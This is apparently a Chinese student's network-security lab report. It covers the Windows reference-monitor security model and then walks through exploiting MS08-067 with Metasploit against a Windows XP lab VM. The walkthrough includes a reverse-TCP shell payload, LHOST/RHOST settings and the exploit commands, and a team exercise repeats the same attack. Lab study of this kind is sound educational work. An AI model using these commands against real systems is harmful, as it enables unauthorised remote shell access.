(1)Windows的安全机制
Windows操作系统基于引用监控器模型来实现基本的对象安全模型,引用监控器模型即系统中所有主体对客体的访问都通过引用监控器作为中介,由引用监控器根据安全访问控制策略来进行授权访问,所有访问记录也都由引用监控器生成审计日志。
基于引用监控器这一经典安全模型,Windows的安全体系结构图如下。最核心的是位于内核中的SRM安全引用监控器、位于用户态的LSASS安全服务。
(1)动手实践Metasploit windows attacker
设备 | IP地址 |
---|---|
Kali(攻击机) | 192.168.37.129 |
Windows XP Professional(靶机) | 192.168.37.131 |
在Kali虚拟机中启动Metasploit
service postgresql start //启动PostgreSQL服务
msfdb init //初始化Metasploit PostgreSQL数据库
msfconsole //启动metasploit
使用命令search ms08_067
搜寻漏洞情况,使用命令use windows/smb/ms08_067_netapi
表明将ms08_067作为目标漏洞
使用命令show payloads
查看有效的攻击载荷,使用命令set payload generic/shell_reverse_tcp
设置攻击的载荷为tcp的反向连接
使用命令show options
查看需要设置的参数,即攻击机与靶机的IP地址。使用命令set LHOST 192.168.37.129
设置攻击机Kali;set RHOST 192.168.37.131
设置靶机Windows XP Professional
使用命令show targets
查看可设置的操作系统类型,使用命令set TARGET 0
表示自动识别。
输入命令exploit
开始渗透,输入ipconfig可以查看靶机自己的IP地址,攻击成功
(2)取证分析实践:解码一次成功的NT系统破解攻击
ip.addr == 172.16.1.106 and http
对数据进行筛选并分析通过以上的NT分析可以了解到,如果我们的主机受到了攻击,采取的防范措施如下:
(3)团队对抗实践:windows系统远程渗透攻击和分析
攻击方IP | 防守方IP |
---|---|
192.168.1.105 | 192.168.1.107 |
Exploit completed, but no session was created
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34 target => 34
然后输入exploit进行攻击即可
本次实践主要学习了Windows的安全机制,以及渗透攻击的攻击过程,最后通过和另外一位同学一起模拟利用MS08-067漏洞进行远程渗透攻击,深刻理解了网络攻防的一般步骤,同时还要多加强理论知识的学习,并投入大量时间去实践,才能把网络攻防技术掌握的更好。